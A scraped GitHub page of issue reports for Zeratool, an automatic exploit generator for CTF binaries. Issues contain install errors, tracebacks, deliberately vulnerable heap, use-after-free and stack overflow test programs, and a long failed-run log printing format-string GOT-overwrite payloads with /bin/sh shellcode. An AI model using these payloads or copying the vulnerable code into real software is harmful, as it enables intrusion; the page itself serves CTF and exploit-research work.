christhecoolhut / zeratool Goto Github PK
View Code? Open in Web Editor NEWAutomatic Exploit Generation (AEG) and remote flag capture for exploitable CTF problems
License: GNU General Public License v3.0
zeratool's People
Contributors
Stargazers
Watchers
Forkers
techlord-rce anarquias subc0ol sitakom kuteminh11 theralfbrown weeshlow qianniaoge qu3stbaby shalekesan idkwim cclauss reydecopas scanfsec inndy shaunstanislauslau bbabacan st1tch ufwt f0829 szliuyujie 7nocturnal hapazores xunnun arunsigood dhayalanb cherry-wb 111cyber0cculte888 cyberlinja limkokholefork deelmind ith4cker ckxckx yangy-xiao xtiankisutsa marcosd4h mmg1 moon3r saucec0de sececter ysf segfaultmasters zytmatrix sllka1 zeratool-kls superf0sh pentestbr qhnetspirit nickk-jk seabreg bgrewell imulmul beerandgin m4rm0k marciopocebon wliuxingxiangyu p1umer enhboldh yssam-mtibaa hasnsobhy cr4ck32 yuuoniy ma5ker reversetools r4b3rt 5l1v3r1 hank0438 ppepos saisai2324 obouzid kwfumou xuchen201810 fr4nc1stein yakum0 kxdkxd 5teven1in hartl3y94 gavazzi1 hdthky optionalg gh0st0ne tor-0 mohinparamasivam souravsg7 hackinfinity jpbarraca dawnadvent 0cyberangel0 licae 0x033c mstheholy int2ecall skyedai910 b1ankj longjohncoder sourcekris peytonizer sinsixx dinosn jackbrozeratool's Issues
source code
about Automatic Exploit Generation(This paper),do you have it`s source code?
can't install it via pip
> pip --version
pip 20.3.4 from /usr/local/lib/python2.7/dist-packages/pip (python 2.7)
error message
> pip install zeratool
ERROR: Could not find a version that satisfies the requirement gitdb>=4.0.1 (from gitdb2>=2.0.0->GitPython==2.1.9->angr->zeratool) (from versions: 0.5.0, 0.5.1, 0.5.2, 0.5.3, 0.5.4, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.6.4)
ERROR: No matching distribution found for gitdb>=4.0.1 (from gitdb2>=2.0.0->GitPython==2.1.9->angr->zeratool)
Why does the program load the local binary to construct the ROP chain even when leaking remotely?
def leak_remote_libc_functions(simgr):
for state in simgr.unconstrained:
properties = state.globals["properties"]
elf = ELF(properties["file"]) #maze point
doesn't work
zerapwn.py challenges/ret -u ctf.hackucf.org -p 9003
[+] Checking pwn type...
[+] Checking for overflow pwn type...
ERROR | 2021-11-18 19:06:04,246 | angr.project | Could not find symbol rand
ERROR | 2021-11-18 19:06:04,247 | angr.project | Could not find symbol srand
WARNING | 2021-11-18 19:06:04,248 | angr.simos.simos | stdin is constrained to 300 bytes (has_end=True). If you are only providing the first 300 bytes instead of the entire stdin, please use stdin=SimFileStream(name='stdin', content=your_first_n_bytes, has_end=False).
WARNING | 2021-11-18 19:06:08,844 | angr.engines.successors | Exit state has over 256 possible solutions. Likely unconstrained; skipping. <BV32 Reverse(input_3_2400[1759:1728])>
Found vulnerable state.
[+] Vulnerable path found b'\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xef\xbe\xad\xde\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9CCCC\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xdd\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
[+] Getting binary protections
[*] '/home/ubuntu/ctf/Zeratool/challenges/ret'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
RPATH: b'/usr/local/lib:$ORIGIN'
INFO | 2021-11-18 19:06:09,019 | pwnlib.elf.elf | '/home/ubuntu/ctf/Zeratool/challenges/ret'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
RPATH: b'/usr/local/lib:$ORIGIN'
Traceback (most recent call last):
File "/root/virtualenvs/zeratool/bin/zerapwn.py", line 129, in
main()
File "/root/virtualenvs/zeratool/bin/zerapwn.py", line 90, in main
properties["win_functions"] = winFunctionDetector.getWinFunctions(args.file)
File "/root/virtualenvs/zeratool/lib/python3.7/site-packages/zeratool/winFunctionDetector.py", line 13, in getWinFunctions
functions = [func for func in json.loads(r2.cmd("aflj"))]
File "/usr/local/src/python37/lib/python3.7/json/init.py", line 348, in loads
return _default_decoder.decode(s)
File "/usr/local/src/python37/lib/python3.7/json/decoder.py", line 337, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/local/src/python37/lib/python3.7/json/decoder.py", line 355, in raw_decode
raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
Challenges (stack, heap and UAF)
Hi!
Here you have vulnerable concept proofs of heap based buffer overflow, stack buffer overflow and user after free.
To compile:
g++ heap.c -o heap
g++ uaf.c -o uaf
g++ stack.c -o stack
Is it possible that the ZeraTool tool could successfully exploit these three cases?
peto@ubuntu:~/Desktop/challenges$ cat heap.c
#include
#include
#include
#include
#define BUFSIZE 10
using namespace std;
int main(int argc, char* argv[])
{
if (argc > 1) {
cout << "argv[1] = " << argv[1] << endl;
} else {
cout << "No file name entered. Exiting...";
return -1;
}
ifstream myReadFile;
myReadFile.open(argv[1]);
char output[8192];
if (myReadFile.is_open()) {
while (!myReadFile.eof()) {
myReadFile >> output;
char *buf;
buf = (char *)malloc(sizeof(char)*BUFSIZE);
strcpy(buf, output);
}
}
myReadFile.close();
return 0;
}
peto@ubuntu:~/Desktop/challenges$ cat uaf.c
#include
#include
#include
#include
#define BUFSIZER1 10
using namespace std;
int main(int argc, char* argv[])
{
if (argc > 1) {
cout << "argv[1] = " << argv[1] << endl;
} else {
cout << "No file name entered. Exiting...";
return -1;
}
ifstream myReadFile;
myReadFile.open(argv[1]);
char output[8192];
if (myReadFile.is_open()) {
while (!myReadFile.eof()) {
myReadFile >> output;
char *buf1R1;
buf1R1 = (char *) malloc(BUFSIZER1);
free(buf1R1);
strcpy(buf1R1, output);
}
}
myReadFile.close();
return 0;
}
peto@ubuntu:~/Desktop/challenges$ cat stack.c
#include
#include
using namespace std;
int main(int argc, char* argv[])
{
if (argc > 1) {
cout << "argv[1] = " << argv[1] << endl;
} else {
cout << "No file name entered. Exiting...";
return -1;
}
ifstream myReadFile;
myReadFile.open(argv[1]);
char output[10];
if (myReadFile.is_open()) {
while (!myReadFile.eof()) {
myReadFile >> output;
cout<<output;
}
}
myReadFile.close();
return 0;
}
Crash while running and never pwn
Hello, while running Zerapwn sample or on a binary that i made, the tool will always end up crashing. Here is the error:
Traceback (most recent call last):
File "/home/XXX/anaconda3/bin/zerapwn.py", line 173, in <module>
main()
File "/home/XXX/anaconda3/bin/zerapwn.py", line 156, in main
properties["pwn_type"]["results"] = formatExploiter.exploitFormat(
File "/home/XXX/anaconda3/lib/python3.9/site-packages/zeratool/formatExploiter.py", line 86, in exploitFormat
rediscoverAndExploit(binary_name, properties, stack_position)
File "/home/XXX/anaconda3/lib/python3.9/site-packages/zeratool/formatExploiter.py", line 121, in rediscoverAndExploit
reg_values = getRegValues(binary_name, entryAddr)
File "/home/XXX/anaconda3/lib/python3.9/site-packages/zeratool/radare_helper.py", line 22, in getRegValues
regs = dict([(x["reg"], int(x["value"], 16)) for x in regs])
File "/home/XXX/anaconda3/lib/python3.9/site-packages/zeratool/radare_helper.py", line 22, in <listcomp>
regs = dict([(x["reg"], int(x["value"], 16)) for x in regs])
ValueError: invalid literal for int() with base 16: '1PSI'
from what i've seen, the issue comes from the rflags.
Thus, i think this could fix the crash:
regs = dict([(x["reg"], int(x["value"], 16)) for x in regs if x["reg"] != "rflags"])
Your tool is really great, so i hope you will fix that, or in case it would appear to be an issue from my computer, that you'll help me fix it.
Using 'crash' file to exploit BoF
Assuming an application that performs reading of files as example, how could it be analyzed with Zerotool using the 'crash' file to exploit the buffer overflow?
Example: filereadapp /dir/mycrashfileBoF.png
Thanks!
r2pipe is no longer supported for python 2
I have trouble while installing zeratool . As zeratool uses r2pipe but the latest version of r2pipe is no longer supported for python2
While installing r2pipe
ERROR: Command errored out with exit status 1:
command: /home/manish/virtualenvs/zeratool/bin/python -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-Rmigan/r2pipe/setup.py'"'"'; __file__='"'"'/tmp/pip-install-Rmigan/r2pipe/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' egg_info --egg-base /tmp/pip-pip-egg-info-Qp3Wkt
cwd: /tmp/pip-install-Rmigan/r2pipe/
Complete output (9 lines):
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/tmp/pip-install-Rmigan/r2pipe/setup.py", line 3, in <module>
import r2pipe
File "r2pipe/__init__.py", line 38, in <module>
from r2pipe.open_sync import open
File "r2pipe/open_sync.py", line 15, in <module>
from urllib.error import URLError
ImportError: No module named error
----------------------------------------
ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.
So it would be better in install.sh if we specify the r2pipe==1.4.2 as it supports python2 and also the package ropper should installed for the zeratool to work
Can not detect vulnerability caused by gets()
When I test Zeratool on my own bin which includes a bof vulnerability caused by gets(), it can not detect it.
I am not familiar with symbolic execution. I debug it and find that gets() can not cause an unconstrained state.
Is there any other way to solve this problem?
The core code is shown below.
.text:080484FD public func1
.text:080484FD func1 proc near ; CODE XREF: main+35�p
.text:080484FD
.text:080484FD s = byte ptr -0Ch
.text:080484FD
.text:080484FD push ebp
.text:080484FE mov ebp, esp
.text:08048500 sub esp, 18h
.text:08048503 sub esp, 0Ch
.text:08048506 lea eax, [ebp+s]
.text:08048509 push eax ; s
.text:0804850A call _gets
.text:0804850F add esp, 10h
.text:08048512 nop
.text:08048513 leave
.text:08048514 retn
.text:08048514 func1 endp
CLECompatibilityError "Unable to find a loader backend for %s"
I've installed Zeratool on a new Kali install. I have r2 installed. I installed via 'pip install zeratool'.
I receive the same CLECompatibilityError for .py and .c files, both my own as well as those in /tests
└─$ zerapwn.py test.py
Traceback (most recent call last):
File "/home/kali/gitclones/Zeratool/venv/bin/zerapwn.py", line 4, in
import('pkg_resources').run_script('zeratool==2.2', 'zerapwn.py')
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/pkg_resources/init.py", line 656, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/pkg_resources/init.py", line 1460, in run_script
exec(script_code, namespace, namespace)
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/zeratool-2.2-py3.10.egg/EGG-INFO/scripts/zerapwn.py", line 246, in
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/zeratool-2.2-py3.10.egg/EGG-INFO/scripts/zerapwn.py", line 111, in main
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/zeratool-2.2-py3.10.egg/zeratool/inputDetector.py", line 12, in checkInputType
p = angr.Project(binary_name)
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/angr-9.2.19-py3.10-linux-x86_64.egg/angr/project.py", line 138, in init
self.loader = cle.Loader(self.filename, concrete_target=concrete_target, **load_options)
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/cle/loader.py", line 133, in init
self.initial_load_objects = self._internal_load(main_binary, *preload_libs, *force_load_libs, preloading=(main_binary, *preload_libs))
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/cle/loader.py", line 689, in _internal_load
obj = self._load_object_isolated(main_spec)
File "/home/kali/gitclones/Zeratool/venv/lib/python3.10/site-packages/cle/loader.py", line 866, in _load_object_isolated
raise CLECompatibilityError("Unable to find a loader backend for %s. Perhaps try the 'blob' loader?" % spec)
cle.errors.CLECompatibilityError: Unable to find a loader backend for /home/kali/shared/test.py. Perhaps try the 'blob' loader?
TypeError: Unexpected keyword arguments: immutable
(angr) angr@2ecf15fad308:/tmp/Zeratool-master$ python3 zeratool.py challenges/ret -u ctf.hackucf.org -p 9003
[+] Checking pwn type...
[+] Checking for overflow pwn type...
Traceback (most recent call last):
File "zeratool.py", line 80, in
main()
File "zeratool.py", line 38, in main
properties['pwn_type'] = overflowDetector.checkOverflow(args.file,inputType=properties['input_type'])
File "/tmp/Zeratool-master/lib/overflowDetector.py", line 34, in checkOverflow
simgr = p.factory.simgr(state, immutable=False, save_unconstrained=True)
File "/home/angr/angr-dev/angr/angr/factory.py", line 198, in simgr
return self.simulation_manager(*args, **kwargs)
File "/home/angr/angr-dev/angr/angr/factory.py", line 192, in simulation_manager
return SimulationManager(self.project, active_states=thing, **kwargs)
File "/home/angr/angr-dev/angr/angr/sim_manager.py", line 108, in init
raise TypeError("Unexpected keyword arguments: " + " ".join(kwargs))
TypeError: Unexpected keyword arguments: immutable
Issue about "hard_format" binary exploitation
I have tried the brand new pull request on the original repo, works fine with me!
But I still have some troubles when exploting the "hard_format" binary, while the others can be exploited succesfully. Although I have run this script for dozens of times, it didn't work.
The log is pretty long:
(zeratool) aaa@aaa-ubuntu1604:~/Zeratool$ python zeratool.py challenges/hard_format
[+] Checking input type
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Found symbolic buffer at position 0 of length 49
[+] Vulnerable path found %x_%
[+] Triggerable with STDIN : %x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x
[+] Getting binary protections
[+] Checking for flag leak
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[+] Returned ,*%x_%0$08x_%1$08x_%2$08x_%3$08x_%4$08x_%5$08x8x_%22$08x_%23$08x_%24$08x_%25$08x_%26$08x_%27$08x_%28$08x_%8x_%46$08x_%47$08x
t***>*><**@b*
[~] Locating buffer stack location
aaaa_0000012c_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
aaaa_2aa615a0_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
aaaa_00000001_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
aaaa_61616161_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
[+] Found stack location at 4
[+] Binary does not have NX
[+] Overwriting GOT entry to point to shellcode
Process with PID 12828 started...
= attach 12828 12828
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
Continue until 0x08048380 using 1 bpsize
hit breakpoint at: 0x8048380
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13007 started...
= attach 13007 13007
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13130 started...
= attach 13130 13130
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13250 started...
= attach 13250 13250
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13370 started...
= attach 13370 13370
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13488 started...
= attach 13488 13488
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13610 started...
= attach 13610 13610
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13729 started...
= attach 13729 13729
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13791 started...
= attach 13791 13791
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13853 started...
= attach 13853 13853
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13915 started...
= attach 13915 13915
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
